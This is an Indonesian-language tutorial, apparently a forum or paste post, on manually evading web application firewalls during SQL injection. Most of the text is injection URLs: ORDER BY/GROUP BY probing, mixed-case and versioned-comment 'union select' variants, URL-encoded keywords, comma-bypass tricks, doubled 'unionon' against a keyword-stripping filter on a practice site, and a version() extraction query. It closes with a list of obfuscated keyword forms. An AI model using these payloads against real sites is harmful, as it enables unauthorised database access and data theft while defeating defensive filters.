Bypass WAF SQLi Manual

1. Beberapa injector hanya memakai query bypass tanpa menganalisa bagian kata yg di block oleh WAF ( Web Aplication Firewall )
2.  
3. Sebelum nya Testing dlu :D
4.  
5.  
6. kalau Order by ga work . coba pakai group+by :D
7.  
8. http://www.webshit.com/vulnscript.php?id=1+order+by+1--+-
9.  
10. http://www.webshit.com/vulnscript.php?id=1+group+by+1--+-
11.  
12.  
13. ----------------------------------------
14.  
15.  
16. http://www.webshit.com/vulnscript.php?id=1+union--+- [waf]
17.  
18. http://www.webshit.com/vulnscript.php?id=1+select--+- [No waf]
19.  
20. brarti fungsi union di block .
21. kita coba bypass dngan kombinasi Uppercase dan lowercase .
22.  
23. http://www.webshit.com/vulnscript.php?id=1+uNiOn--+- [waf Bypassed]
24.  
25. atau klo masih kena Waf
26.  
27. http://www.webshit.com/vulnscript.php?id=2 /*!uNiOn*/--+-
28.  
29. atau
30.  
31. http://www.webshit.com/vulnscript.php?id=1+/*!50000uNiOn*/--+-
32.  
33.  
34. okay bypassed :D
35.  
36. -------------------------------------
37.  
38. tahap berikut nya Union Select
39.  
40. http://www.webshit.com/vulnscript.php?id=1+union--+- [no waf]
41.  
42. http://www.webshit.com/vulnscript.php?id=1+select--+- [no waf]
43.  
44. tapi saat
45.  
46. http://www.webshit.com/vulnscript.php?id=1+union+select--+- [Waf]
47.  
48. brarti Waf block kombinasi kata union select ..
49.  
50. kita bs bypass dgn
51.  
52. http://www.webshit.com/vulnscript.php?id=1+union+distinctROW+select--+-
53.  
54. atau
55.  
56. http://www.webshit.com/vulnscript.php?id=1+union%23%0aselect--+-
57.  
58. yuhuu Bypassed :D
59.  
60. ---------------------------------------
61.  
62.  
63. Bypass dengan url Encode jg bs
64.  
65. http://www.webshit.com/vulnscript.php?id=1+%75Nion+%73eLect--+-
66.  
67. %75 = u
68. %73 = s
69.  
70. ----------------------------------------
71.  
72. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1--+- [no waf]
73.  
74. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,2--+- [waf]
75.  
76. Hmm ketika menambah (,) kena waf , brarti koma harus dibypass :D
77.  
78. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2--+- [bypassed]
79.  
80. http://www.webshit.com/vulnscript.php?id=1+/*!50000union*/ DISTINCTROW /*!50000select*/+1,~~2,~~3,~~4,~~5--+- [bypassed]
81.  
82. atau
83.  
84. http://www.webshit.com/vulnscript.php?id=1+uNiOn(/**_**/(seLeCt(1),(2),(3),(4),(5))-- - [bypassed]
85.  
86. atau dgn method join :v
87.  
88. ----------------------------------------
89.  
90. beberapa injector menggunakan UnionOnOn / informationmation_schema_schema tnpa tau maksud query itu :p
91.  
92. oke skrang kita cari tau :v
93.  
94. live target :
95.  
96. http://zixem.altervista.org/SQLi/level3.php?item=3'+union--+-
97.  
98. hasil :
99.  
100. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'uni-- -'' at line 1
101.  
102. dari situ kita bs liat kalau "on" pada "union" hilang :v
103.  
104. bagaimana bypass nya ??
105.  
106. tambahin aja on di union nya jadi unionon :v
107.  
108. http://zixem.altervista.org/SQLi/level3.php?item=3'+unionon--+-
109.  
110. wokee bypassed :D
111.  
112. selanjutnya sperti biasa
113.  
114. http://zixem.altervista.org/SQLi/level3.php?item=3%27+and+0+unionon+select+concat(%27versailles%20::%20%27,version()),2,4,5--+-
115.  
116. ###############################
117. Alternativ bypass union select jika langkah diatas blm bs bypass .
118.  
119. uni<>on sel<>ect
120.  
121. uni*on sel*ect
122.  
123. (uni)(on) (sel)(ect)
124.  
125. uni[]on sel[]ect
126.  
127. uni\on sel\ect
128. ###############################